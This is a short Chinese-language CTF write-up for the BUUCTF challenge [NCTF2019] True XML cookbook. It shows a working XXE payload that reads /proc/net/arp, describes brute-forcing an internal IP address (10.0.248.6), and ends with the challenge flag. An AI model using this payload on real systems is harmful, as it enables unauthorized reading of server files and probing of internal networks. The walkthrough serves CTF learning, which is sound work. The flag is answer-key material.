当前位置: 代码迷 >> 综合 >> 【xxe漏洞】buu_[NCTF2019]True XML cookbook
  详细解决方案

【xxe漏洞】buu_[NCTF2019]True XML cookbook

热度:76   发布时间:2024-01-19 13:26:36.0

1.打开网页,一个熟悉的界面,抓包发现Content-Type:为application/xml,存在xxe漏洞:

2.读取相关敏感文件proc/net/arp,发现存在一个ip地址:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY exp SYSTEM "file:///proc/net/arp">]>
<user><username>&exp;</username><password>aaaa</password></user>

3.使用superdic制作一个数字字典,对三段地址进行爆破:

爆破出三段网址为10.0.248.6

4.重发器访问也行:

flag{f337c643-d272-4730-b4a0-f1a9694661cb}

  相关解决方案